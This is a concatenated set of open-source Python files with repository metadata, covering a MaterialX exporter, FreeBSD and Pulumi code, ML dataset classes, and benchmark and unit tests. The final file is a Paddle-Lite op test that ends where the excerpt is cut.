# Git hash for tracking source document
global INPUTFILEHASH
INPUTFILEHASH = _computeGitHash(opts.inputFilename)
except mx.ExceptionFileMissing as err:
print(err)
sys.exit(0)
if opts.stdlib:
stdlib = mx.createDocument()
filePath = os.path.dirname(os.path.abspath(__file__))
searchPath = mx.FileSearchPath(os.path.join(filePath, '..', '..'))
searchPath.append(os.path.dirname(opts.inputFilename))
libraryFolders = ["libraries"]
mx.loadLibraries(libraryFolders, searchPath, stdlib)
doc.importLibrary(stdlib)
(valid, message) = doc.validate()
if valid:
print("%s is a valid MaterialX document in v%s" %
(opts.inputFilename, mx.getVersionString()))
else:
print("%s is not a valid MaterialX document in v%s" %
(opts.inputFilename, mx.getVersionString()))
print(message)
nodedefs = doc.getNodeDefs()
nodedef = findNodeDef(nodedefs, opts.nodedef)
print("Document Version: {}.{:02d}".format(*doc.getVersionIntegers()))
if nodedef is None:
print("Nodedef %s not found" % (opts.nodedef))
else:
try:
exportNodeDef(nodedef)
print("%d NodeDef%s found.\nNode '%s' exported to %s(.json/.hpp)"
% (len(nodedefs), pl(nodedefs), opts.nodedef, nodedef.getNodeString()))
except Exception as e:
print(e)
sys.exit(0)
def findNodeDef(elemlist, nodedefname):
if len(elemlist) == 0:
return None
for elem in elemlist:
if elem.isA(mx.NodeDef) and elem.getName() == nodedefname:
return elem
return None
def exportNodeDef(elem):
if elem.isA(mx.NodeDef):
jsonfilename = elem.getNodeString()+'.json'
hppfilename = elem.getNodeString()+'.hpp'
export_json(elem, jsonfilename)
export_hpp(elem, hppfilename)
def export_json(elem, filename):
nodefInterface = {}
nodefInterface["Nodedef"] = elem.getName()
nodefInterface["SHA1"] = INPUTFILEHASH
nodefInterface["MaterialX"] = mx.getVersionString()
nodefInterface["name"] = elem.getNodeString()
asJsonArray(nodefInterface, elem)
with open(filename, 'w', encoding='utf-8') as f:
json.dump(nodefInterface, f, indent=4)
def asJsonArray(nodefInterface, nodedef):
inputs = []
outputs = []
for inp in nodedef.getActiveInputs():
inputs.append((_getType(inp.getType()),
inp.getName(),
str(inp.getValue())))
nodefInterface["inputs"] = inputs
for output in nodedef.getActiveOutputs():
outputs.append((_getType(output.getType()),
output.getName(),
str(output.getValue())))
nodefInterface["outputs"] = outputs
def export_hpp(elem, filename):
# write to file
preamble = "/*\nGenerated using MaterialX nodedef \
\n{nodename}\nSHA1:{filehash}\nVersion:{version}\n*/\n"\
.format(nodename=elem, filehash=INPUTFILEHASH, version=mx.getVersionString())
variable_defs = ""
for inp in elem.getActiveInputs():
#create decl
decl = getVarDeclaration(inp)
#emit variable decl
if decl is None:
variable_def = ' {typename} {name};\n' \
.format(typename=_getType(inp.getType()),
name=inp.getName())
else:
variable_def = ' {typename} {name} = {declaration};\n' \
.format(typename=_getType(inp.getType()),
name=inp.getName(),
declaration=decl)
variable_defs += variable_def
for output in elem.getActiveOutputs():
#create decl
decl = getVarDeclaration(output)
#emit output
if decl is None:
variable_def = ' {typename}* {name};\n' \
.format(typename=_getType(output.getType()),
name=output.getName())
else:
variable_def = ' {typename} {name} = {declaration};\n' \
.format(typename=_getType(output.getType()),
name=output.getName(),
declaration=decl)
variable_defs += variable_def
nodename_definition = ' std::string _nodename_ = "{nodename}";\n'.format(
nodename=elem.getNodeString())
# create struct definition
struct_definition = """struct {structname} {{\n{variabledefs}{nodeiddef}}};""" \
.format(structname=elem.getName(),
variabledefs=variable_defs,
nodeiddef=nodename_definition)
with open(filename, 'w', encoding='utf-8') as f:
f.write(preamble)
f.write(struct_definition)
f.close()
def getVarDeclaration(inputVar):
inputValue = inputVar.getValue()
typeName = _getType(inputVar.getType())
if isinstance(inputValue, (mx.Color3, mx.Vector3)):
val = '{typename}({v0}f, {v1}f, {v2}f)'.format(typename=typeName,
v0=round(
inputValue[0], 5),
v1=round(
inputValue[1], 5),
v2=round(inputValue[2], 5))
return val
if isinstance(inputValue, (mx.Color4, mx.Vector4)):
val = '{typename}({v0}f, {v1}f, {v2}f, {v3}f)'.format(typename=typeName,
v0=round(
inputValue[0], 5),
v1=round(
inputValue[1], 5),
v2=round(
inputValue[2], 5),
v3=round(inputValue[3], 5))
return val
if isinstance(inputValue, float):
val = '{0}f'.format(round(inputValue, 5))
return val
if isinstance(inputValue, bool):
val = '{0}'.format('true' if inputValue is True else 'false')
return val
if isinstance(inputValue, int):
val = '{0}'.format(inputValue)
return val
# use input type if value is not defined and set default
defaultValue = _getDefault(inputVar.getType())
if inputValue is None:
if inputVar.getType() in ['vector2']:
val = '{typename}({v0}f, {v1}f)'.format(typename=typeName,
v0=defaultValue[0],
v1=defaultValue[1])
return val
if inputVar.getType() in ['vector3', 'color3']:
val = '{typename}({v0}f, {v1}f, {v2}f)'.format(typename=typeName,
v0=defaultValue[0],
v1=defaultValue[1],
v2=defaultValue[2])
return val
if inputVar.getType() in ['vector4', 'color4']:
val = '{typename}({v0}f, {v1}f, {v2}f, {v3}f)'.format(typename=typeName,
v0=defaultValue[0],
v1=defaultValue[1],
v2=defaultValue[2],
v3=defaultValue[3])
return val
else:
print("unhandled: " + typeName)
return None
def pl(elem):
if len(elem) == 1:
return ""
else:
return "s"
if __name__ == '__main__':
main()
|
7a544dfa7b3f33b3d9b3ea1a0744b5efa12f70b2
|
9907672fcd81ab73ac63b2a83422a82bf31eadde
|
/tyama_icpc2015dpA.py
|
73ca29381e2a7a385c189d7f7d5abdd4b1c5d955
|
[
"0BSD"
] |
permissive
|
cielavenir/procon
|
bbe1974b9bddb51b76d58722a0686a5b477c4456
|
746e1a91f574f20647e8aaaac0d9e6173f741176
|
refs/heads/master
| 2023-06-21T23:11:24.562546
| 2023-06-11T13:15:15
| 2023-06-11T13:15:15
| 7,557,464
| 137
| 136
| null | 2020-10-20T09:35:52
| 2013-01-11T09:40:26
|
C++
|
UTF-8
|
Python
| false
| false
| 209
|
py
|
tyama_icpc2015dpA.py
|
#!/usr/bin/python
import sys,math
if sys.version_info[0]>=3: raw_input=input
while True:
a,b=[int(e) for e in raw_input().split()]
if not a: break
print(min(abs(b-math.hypot(i,a-i)) for i in range(a//2+1)))
|
94c2007d1c7ca21e26b89536633db4a0b70cb837
|
e65a4dbfbfb0e54e59787ba7741efee12f7687f3
|
/x11-toolkits/py-qt5-chart/files/patch-configure.py
|
01781a2e74801a97c48f368e28bd4bd97c08a885
|
[
"BSD-2-Clause"
] |
permissive
|
freebsd/freebsd-ports
|
86f2e89d43913412c4f6b2be3e255bc0945eac12
|
605a2983f245ac63f5420e023e7dce56898ad801
|
refs/heads/main
| 2023-08-30T21:46:28.720924
| 2023-08-30T19:33:44
| 2023-08-30T19:33:44
| 1,803,961
| 916
| 918
|
NOASSERTION
| 2023-09-08T04:06:26
| 2011-05-26T11:15:35
| null |
UTF-8
|
Python
| false
| false
| 829
|
py
|
patch-configure.py
|
--- configure.py.orig 2021-10-26 11:10:38 UTC
+++ configure.py
@@ -1549,10 +1549,10 @@ INSTALLS += sip
# These optimisations could apply to other platforms.
if module_config.no_exceptions:
- if target_config.py_platform.startswith('linux') or target_config.py_platform == 'darwin':
+ if target_config.py_platform.startswith('linux') or target_config.py_platform.startswith('freebsd') or target_config.py_platform == 'darwin':
pro.write('QMAKE_CXXFLAGS += -fno-exceptions\n')
- if target_config.py_platform.startswith('linux') and not opts.static:
+ if target_config.py_platform.startswith('linux') or target_config.py_platform.startswith('freebsd') and not opts.static:
if target_config.py_version >= 0x030000:
entry_point = 'PyInit_%s' % mname
else:
|
a97c4a9cae429eb0c4374d84b26c2a6f9cbfff23
|
1742b6719b988e5519373002305e31d28b8bd691
|
/sdk/python/pulumi_aws/lakeformation/get_resource.py
|
2f4789fb310701d2be86d399ebc5c0af7c9dd677
|
[
"BSD-3-Clause",
"MPL-2.0",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-aws
|
4f7fdb4a816c5ea357cff2c2e3b613c006e49f1a
|
42b0a0abdf6c14da248da22f8c4530af06e67b98
|
refs/heads/master
| 2023-08-03T23:08:34.520280
| 2023-08-01T18:09:58
| 2023-08-01T18:09:58
| 97,484,940
| 384
| 171
|
Apache-2.0
| 2023-09-14T14:48:40
| 2017-07-17T14:20:33
|
Java
|
UTF-8
|
Python
| false
| false
| 3,931
|
py
|
get_resource.py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetResourceResult',
'AwaitableGetResourceResult',
'get_resource',
'get_resource_output',
]
@pulumi.output_type
class GetResourceResult:
"""
A collection of values returned by getResource.
"""
def __init__(__self__, arn=None, id=None, last_modified=None, role_arn=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if last_modified and not isinstance(last_modified, str):
raise TypeError("Expected argument 'last_modified' to be a str")
pulumi.set(__self__, "last_modified", last_modified)
if role_arn and not isinstance(role_arn, str):
raise TypeError("Expected argument 'role_arn' to be a str")
pulumi.set(__self__, "role_arn", role_arn)
@property
@pulumi.getter
def arn(self) -> str:
return pulumi.get(self, "arn")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lastModified")
def last_modified(self) -> str:
"""
Date and time the resource was last modified in [RFC 3339 format](https://tools.ietf.org/html/rfc3339#section-5.8).
"""
return pulumi.get(self, "last_modified")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> str:
"""
Role that the resource was registered with.
"""
return pulumi.get(self, "role_arn")
class AwaitableGetResourceResult(GetResourceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetResourceResult(
arn=self.arn,
id=self.id,
last_modified=self.last_modified,
role_arn=self.role_arn)
def get_resource(arn: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetResourceResult:
"""
Provides details about a Lake Formation resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.lakeformation.get_resource(arn="arn:aws:s3:::tf-acc-test-9151654063908211878")
```
:param str arn: ARN of the resource, an S3 path.
"""
__args__ = dict()
__args__['arn'] = arn
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('aws:lakeformation/getResource:getResource', __args__, opts=opts, typ=GetResourceResult).value
return AwaitableGetResourceResult(
arn=pulumi.get(__ret__, 'arn'),
id=pulumi.get(__ret__, 'id'),
last_modified=pulumi.get(__ret__, 'last_modified'),
role_arn=pulumi.get(__ret__, 'role_arn'))
@_utilities.lift_output_func(get_resource)
def get_resource_output(arn: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetResourceResult]:
"""
Provides details about a Lake Formation resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.lakeformation.get_resource(arn="arn:aws:s3:::tf-acc-test-9151654063908211878")
```
:param str arn: ARN of the resource, an S3 path.
"""
...
|
38eef92bb1e4300d1771d0e3e0cbc289267e2495
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/CommonScripts/Scripts/ChangeContext/ChangeContext.py
|
3fe0bb9e2abe55e20cf80ed7086a2f115c7ed2c8
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 1,281
|
py
|
ChangeContext.py
|
from CommonServerPython import *
import json
def replace_context(args: dict) -> tuple:
context = args.get('input', '')
output_key = args.get('output_key', '')
inplace = args.get('inplace', 'True') == 'True'
capitalize = args.get('capitalize') == 'True'
replace_dict = json.loads(args.get('replace_dict', "{}"))
if not context:
return "The context key you've entered is empty. Nothing has happened.", {}, {}
if not isinstance(context, (list, dict)):
return "The context key you've entered is at the lowest level and cannot be changed.", {}, {}
def replace_func(key):
if key in replace_dict.keys():
return replace_dict.get(key)
else:
if capitalize:
return key.title()
return key
new_context = createContext(context, keyTransform=replace_func)
if inplace:
demisto.executeCommand("Set", {'key': output_key, 'value': new_context})
return f"Changed {output_key} successfully", {}, {}
else:
return f"Appended {output_key} successfully", {output_key: new_context}, {}
def main():
hr, ec, raw = replace_context(demisto.args())
return_outputs(hr, ec, raw)
if __name__ in ['__main__', 'builtin', 'builtins']:
main()
|
7ddde8adc11cdac5a6c68113f1df0998dae56b94
|
2dd26e031162e75f37ecb1f7dd7f675eeb634c63
|
/nemo/collections/nlp/data/text_normalization_as_tagging/thutmose_tagger_dataset.py
|
c8df33885622798bce3c25e4204b9b9a0625bc73
|
[
"Apache-2.0"
] |
permissive
|
NVIDIA/NeMo
|
1b001fa2ae5d14defbfd02f3fe750c5a09e89dd1
|
c20a16ea8aa2a9d8e31a98eb22178ddb9d5935e7
|
refs/heads/main
| 2023-08-21T15:28:04.447838
| 2023-08-21T00:49:36
| 2023-08-21T00:49:36
| 200,722,670
| 7,957
| 1,986
|
Apache-2.0
| 2023-09-14T18:49:54
| 2019-08-05T20:16:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,122
|
py
|
thutmose_tagger_dataset.py
|
# Copyright (c) 2022, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict, List, Optional
import numpy as np
from nemo.collections.nlp.data.text_normalization_as_tagging.bert_example import BertExampleBuilder, read_input_file
from nemo.core.classes.dataset import Dataset
from nemo.core.neural_types import ChannelType, IntType, LabelsType, MaskType, NeuralType
__all__ = ["ThutmoseTaggerDataset", "ThutmoseTaggerTestDataset"]
class ThutmoseTaggerDataset(Dataset):
"""
Dataset as used by the ThutmoseTaggerModel for training, validation, and inference
pipelines.
Args:
input_file (str): path to tsv-file with data
example_builder: instance of BertExampleBuilder
"""
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
"""Returns definitions of module output ports.
"""
return {
"input_ids": NeuralType(('B', 'T'), ChannelType()),
"input_mask": NeuralType(('B', 'T'), MaskType()),
"segment_ids": NeuralType(('B', 'T'), ChannelType()),
"labels_mask": NeuralType(('B', 'T'), MaskType()),
"tag_labels": NeuralType(('B', 'T'), LabelsType()),
"semiotic_labels": NeuralType(('B', 'T'), LabelsType()),
"semiotic_spans": NeuralType(('B', 'T', 'C'), IntType()),
}
def __init__(self, input_file: str, example_builder: BertExampleBuilder) -> None:
self.examples = read_input_file(example_builder, input_file, infer=False)
def __len__(self):
return len(self.examples)
def __getitem__(self, idx: int):
input_ids = np.array(self.examples[idx].features["input_ids"])
input_mask = np.array(self.examples[idx].features["input_mask"])
segment_ids = np.array(self.examples[idx].features["segment_ids"])
labels_mask = np.array(self.examples[idx].features["labels_mask"])
tag_labels = np.array(self.examples[idx].features["tag_labels"])
semiotic_labels = np.array(self.examples[idx].features["semiotic_labels"])
semiotic_spans = np.array(self.examples[idx].features["semiotic_spans"])
return input_ids, input_mask, segment_ids, labels_mask, tag_labels, semiotic_labels, semiotic_spans
class ThutmoseTaggerTestDataset(Dataset):
"""
Dataset for inference pipeline.
Args:
sents: list of strings
example_builder: instance of BertExampleBuilder
"""
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
"""Returns definitions of module output ports.
"""
return {
"input_ids": NeuralType(('B', 'T'), ChannelType()),
"input_mask": NeuralType(('B', 'T'), MaskType()),
"segment_ids": NeuralType(('B', 'T'), ChannelType()),
}
def __init__(self, sents: List[str], example_builder: BertExampleBuilder) -> None:
self.examples = []
for source in sents:
example = example_builder.build_bert_example(source, infer=True)
if example is None:
raise ValueError("Cannot build example from: " + source)
self.examples.append(example)
def __len__(self):
return len(self.examples)
def __getitem__(self, idx: int):
input_ids = np.array(self.examples[idx].features["input_ids"])
input_mask = np.array(self.examples[idx].features["input_mask"])
segment_ids = np.array(self.examples[idx].features["segment_ids"])
return input_ids, input_mask, segment_ids
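# Hedged usage sketch (the builder construction is assumed; a real pipeline
# obtains its BertExampleBuilder from the ThutmoseTaggerModel configuration):
#   test_ds = ThutmoseTaggerTestDataset(["twenty twelve"], example_builder)
#   input_ids, input_mask, segment_ids = test_ds[0]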
|
dcd9144ebea0ba875871699cdac5b4dc5813d923
|
b3950a2a6912c9b494d22b9353322c3357df0110
|
/tock/tock/apps.py
|
2f83c7883915590f4cb3e8bfb62fce9be3663333
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
18F/tock
|
df1fa5e817e690ce0bff315a15799e2f78915882
|
99005d8f6c4605a69fbb620c41f38447ecbee459
|
refs/heads/main
| 2023-08-31T01:34:55.299577
| 2023-08-23T18:49:10
| 2023-08-23T18:49:10
| 30,162,008
| 135
| 50
|
NOASSERTION
| 2023-09-07T18:40:30
| 2015-02-01T22:19:32
|
Python
|
UTF-8
|
Python
| false
| false
| 166
|
py
|
apps.py
|
from django.apps import AppConfig
from .signals import setup_signals
class TockAppConfig(AppConfig):
name = "tock"
def ready(self):
setup_signals()
|
22fee79bfbecf2a6f0056dd95ec96be51234d174
|
ecaba173879f92f24e3c951866fda23c0a4fc426
|
/tests/linux_benchmarks/large_scale_boot_benchmark_test.py
|
9e583f2a030f7ffc964fe96d2bdf37deae8d38e2
|
[
"Classpath-exception-2.0",
"BSD-3-Clause",
"AGPL-3.0-only",
"MIT",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
GoogleCloudPlatform/PerfKitBenchmarker
|
2f4917fd796db4eb90822c557d8fa08a497fbd48
|
d0699f32998898757b036704fba39e5471641f01
|
refs/heads/master
| 2023-09-02T08:14:54.110308
| 2023-09-01T20:28:01
| 2023-09-01T20:28:38
| 21,950,910
| 1,923
| 567
|
Apache-2.0
| 2023-09-13T22:37:42
| 2014-07-17T17:23:26
|
Python
|
UTF-8
|
Python
| false
| false
| 5,453
|
py
|
large_scale_boot_benchmark_test.py
|
# Copyright 2018 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for large scale boot benchmark."""
import copy
import unittest
from absl import flags
import mock
from perfkitbenchmarker import errors
from perfkitbenchmarker import sample
from perfkitbenchmarker.linux_benchmarks import large_scale_boot_benchmark
from tests import pkb_common_test_case
FLAGS = flags.FLAGS
class LargeScaleBootBenchmarkTest(pkb_common_test_case.PkbCommonTestCase):
@mock.patch.object(
large_scale_boot_benchmark, '_GetExpectedBoots', return_value=4)
def testWaitForResponsesSuccess(self, mock_func):
vm1 = mock.Mock()
vm1.RemoteCommand.side_effect = [('', ''), ('2', '')]
vm2 = mock.Mock()
vm2.RemoteCommand.side_effect = [('', ''), ('2', '')]
large_scale_boot_benchmark._WaitForResponses([vm1, vm2])
vm1.RemoteCommand.assert_called_with(
'grep -c Pass /tmp/pkb/results', ignore_failure=True)
vm2.RemoteCommand.assert_called_with(
'grep -c Pass /tmp/pkb/results', ignore_failure=True)
@mock.patch.object(
large_scale_boot_benchmark, '_GetExpectedBoots', return_value=4)
def testWaitForResponsesDeadServer(self, mock_func):
vm1 = mock.Mock()
vm1.RemoteCommand.side_effect = [('Error: Failed', ''), ('2', '')]
with self.assertRaises(errors.Benchmarks.RunError):
large_scale_boot_benchmark._WaitForResponses([vm1])
@mock.patch.object(
large_scale_boot_benchmark, '_GetExpectedBoots', return_value=5)
def testWaitForResponsesTwice(self, mock_func):
vm1 = mock.Mock()
vm1.RemoteCommand.side_effect = [
('', ''), ('2', ''), ('', ''), ('5', '')]
large_scale_boot_benchmark._WaitForResponses([vm1])
self.assertEqual(vm1.RemoteCommand.call_count, 4)
def testParseResult(self):
FLAGS['num_vms'].value = 2
FLAGS['boots_per_launcher'].value = 3
FLAGS['zone'].value = 'zone'
vm1 = mock.Mock()
vm1.RemoteCommand.side_effect = [('6', ''),
('Pass:a:8\nPass:b:9\nPass:c:13', '')]
vm1.zone = 'zone'
vm2 = mock.Mock()
vm2.RemoteCommand.side_effect = [('2', ''),
('Pass:d:4\nFail:e:5\nPass:f:6', '')]
vm2.zone = 'zone'
results = large_scale_boot_benchmark._ParseResult([vm1, vm2])
common_metadata = {
'cloud': 'GCP',
'num_launchers': 2,
'expected_boots_per_launcher': 3,
'boot_os_type': 'debian11',
'boot_machine_type': 'n1-standard-2',
'launcher_machine_type': 'n1-standard-16',
'vms_contact_launcher': True,
'use_public_ip': False,
}
metadata1 = copy.deepcopy(common_metadata)
metadata1.update({
'zone': 'zone',
'launcher_successes': 3,
'launcher_boot_durations_ns': [2, 3, 7],
'launcher_closed_incoming': 0
})
metadata2 = copy.deepcopy(common_metadata)
metadata2.update({
'zone': 'zone',
'launcher_successes': 2,
'launcher_boot_durations_ns': [2, 4],
'launcher_closed_incoming': 1
})
expected = [
sample.Sample(
metric='Launcher Boot Details',
value=-1,
unit='',
metadata=metadata1),
sample.Sample(
metric='Launcher Boot Details',
value=-1,
unit='',
metadata=metadata2),
sample.Sample(
metric='Cluster Max Boot Time',
value=7,
unit='nanoseconds',
metadata=common_metadata),
sample.Sample(
metric='Cluster Max Boot Sec',
value=0.000000007,
unit='seconds',
metadata=common_metadata),
sample.Sample(
metric='Cluster Mean Boot Sec',
value=0.000000003,
unit='seconds',
metadata=common_metadata),
sample.Sample(
metric='Cluster Median Boot Sec',
value=0.000000003,
unit='seconds',
metadata=common_metadata),
sample.Sample(
metric='Cluster Expected Boots',
value=6,
unit='',
metadata=common_metadata),
sample.Sample(
metric='Cluster Success Boots', value=5, unit='',
metadata=common_metadata)
]
for result, expected in zip(results, expected):
self.assertEqual(result.metric, expected.metric,
'Metric name for {} is not equal.'.format(
expected.metric))
self.assertEqual(result.value, expected.value,
'Metric value for {} is not equal.'.format(
expected.metric))
self.assertDictEqual(result.metadata, expected.metadata,
'Metadata for {} is not equal'.format(
expected.metric))
if __name__ == '__main__':
unittest.main()
|
5e78d478dc2be5ae6c1efc5a2da8a0194192f357
|
75762795be601735f4a5ae80f39ea93ae597b8c1
|
/mp_readline/test.py
|
ef9be6c268d24989adf5a9481f298c3a45f41da4
|
[
"MIT"
] |
permissive
|
leffss/devops
|
49a60792d2fdbf5152a3db8021185c0b7bff336d
|
dd590c8bada955f27562a0881ad3445442958f86
|
refs/heads/master
| 2023-04-07T01:24:53.052233
| 2022-08-09T09:15:49
| 2022-08-09T09:15:49
| 199,561,033
| 372
| 162
|
MIT
| 2023-03-31T14:55:52
| 2019-07-30T02:39:28
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 729
|
py
|
test.py
|
#!/usr/bin/env python3
"""Test cases for mp_readline"""
import mp_readline
mp_readline.TESTING = True
rl = mp_readline.MpReadline()
if __name__ == "__main__":
input1 = b'free asd\x08\x08\x08\x08\x08\x08\x08\x08pp\x1b[K\x08\x08free asd\x08\x08\x08\x08\x08\x08\x08\x08pp\x1b[K\x08\x08sk\x08\x08vim xasd\x08\x08\x08\x08\x08\x08\x08\x08\x1b[1Pfree -m'
input = b'pp\x1b[K\x08\x08pp\x1b[K\x08\x08\x1b[1Pfree -m'
inputx = b'pp\x1b[K\x08\x08\x1b[1Pfree -m'
# \x1b[1
xx = b'free -m\x08\x08\x08\x08\x08\x08\x08\x1b[5Pls -l\x08\x08\x08\x08\x08free -m\x08\x08asd\x08\x08\x08\x08\x08\x08\x08\x08pp\x1b[K'
yy = 'pp'
real = 'free -m'
a = rl.process_line(xx)
print(a)
x = 1
y = 2
print(x, y)
|
2365cd8bac63cda5e797bb925c7510375f072d6e
|
bdc27c22522a99b5bff2ec4cfa95fadcba65747d
|
/testing/adios2/bindings/python/TestBPPNGHighLevelAPI.py
|
fc3588b8f4c996aa0c4f385bdd30134118db612d
|
[
"Apache-2.0"
] |
permissive
|
ornladios/ADIOS2
|
a34e257b28adb26e6563b800502266ebb0c9088c
|
c8b7b66ed21b03bfb773bd972d5aeaaf10231e67
|
refs/heads/master
| 2023-08-31T18:11:22.186415
| 2023-08-29T20:45:03
| 2023-08-29T20:45:03
| 75,750,830
| 243
| 140
|
Apache-2.0
| 2023-09-14T11:15:00
| 2016-12-06T16:39:55
|
C++
|
UTF-8
|
Python
| false
| false
| 2,480
|
py
|
TestBPPNGHighLevelAPI.py
|
#!/usr/bin/env python
#
# Distributed under the OSI-approved Apache License, Version 2.0. See
# accompanying file Copyright.txt for details.
#
# TestBPPNGHighLevelAPI.py
#
# Created on: June 7th, 2019
# Author: William F Godoy
import numpy as np
import random
from mpi4py import MPI
import adios2
def CompressPNG(compression_level):
fname = "BPWRPNG_" + str(compression_level) + "_py.bp"
Nx = 10
Ny = 50
channels = 3
NSteps = 1
# initialize values
u32s = np.zeros([Nx, Ny], np.uint32)
u8s = np.zeros([Nx, Ny, channels], np.uint8)
value_ji = 0.
for i in range(0, Nx):
for j in range(0, Ny):
u32s[i][j] = value_ji
u8s[i][j][0] = random.randrange(256)
u8s[i][j][1] = random.randrange(256)
u8s[i][j][2] = random.randrange(256)
value_ji += 1.
# set global dimensions
# MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
shape3D = [Nx * size, Ny, 3]
start3D = [Nx * rank, 0, 0]
count3D = [Nx, Ny, 3]
shape2D = [Nx * size, Ny]
start2D = [Nx * rank, 0]
count2D = [Nx, Ny]
# writer
with adios2.open(fname, "w", comm) as fw:
for s in range(0, NSteps):
fw.write("u8", u8s, shape3D, start3D, count3D,
[('PNG', {'bit_depth': '8',
'color_type': 'PNG_COLOR_TYPE_RGB',
'compression_level': str(compression_level)})])
fw.write("u32", u32s, shape2D, start2D, count2D,
[('PNG', {'bit_depth': '8',
'color_type': 'PNG_COLOR_TYPE_RGBA',
'compression_level': str(compression_level)})],
end_step=True)
# reader
with adios2.open(fname, "r", comm) as fr:
for fstep in fr:
in_u8s = fstep.read("u8", start3D, count3D)
in_u32s = fstep.read("u32", start2D, count2D)
for i in range(0, Nx):
for j in range(0, Ny):
assert (u32s[i][j] == in_u32s[i][j])
assert (u8s[i][j][0] == in_u8s[i][j][0])
assert (u8s[i][j][1] == in_u8s[i][j][1])
assert (u8s[i][j][2] == in_u8s[i][j][2])
def main():
CompressPNG(compression_level=1)
CompressPNG(compression_level=4)
CompressPNG(compression_level=9)
if __name__ == "__main__":
main()
|
2e72879983a74cf407f77b1c10ec56e87a372198
|
d17a8870ff8ac77b82d0d37e20c85b23aa29ca74
|
/lite/tests/unittest_py/op/common/test_beam_search_decode_op_base.py
|
1985632bd27a1ecf8a596207cb6fe84913cdb893
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/Paddle-Lite
|
4ab49144073451d38da6f085a8c56822caecd5b2
|
e241420f813bd91f5164f0d9ee0bc44166c0a172
|
refs/heads/develop
| 2023-09-02T05:28:14.017104
| 2023-09-01T10:32:39
| 2023-09-01T10:32:39
| 104,208,128
| 2,545
| 1,041
|
Apache-2.0
| 2023-09-12T06:46:10
| 2017-09-20T11:41:42
|
C++
|
UTF-8
|
Python
| false
| false
| 2,371
|
py
|
test_beam_search_decode_op_base.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
import hypothesis.strategies as st
from hypothesis import assume
def sample_program_configs(draw):
in_shape = draw(st.sampled_from([[5, 1]]))
lod_data = draw(st.sampled_from([[[0, 1, 2], [0, 2, 4]]]))
def generate_pre_ids(*args, **kwargs):
return np.random.random(in_shape).astype(np.int64)
def generate_pre_score(*args, **kwargs):
return np.random.random(in_shape).astype(np.float32)
beam_search_ops = OpConfig(
type="beam_search_decode",
inputs={
"Ids": ["ids_data", "ids_data2"],
"Scores": ["scores_data", "scores_data2"]
},
outputs={
"SentenceIds": ["sentence_ids_data"],
"SentenceScores": ["sentence_scores_data"]
},
attrs={"beam_size": in_shape[0],
"end_id": 0})
program_config = ProgramConfig(
ops=[beam_search_ops],
weights={},
inputs={
"ids_data": TensorConfig(
data_gen=partial(generate_pre_ids), lod=lod_data),
"ids_data2": TensorConfig(
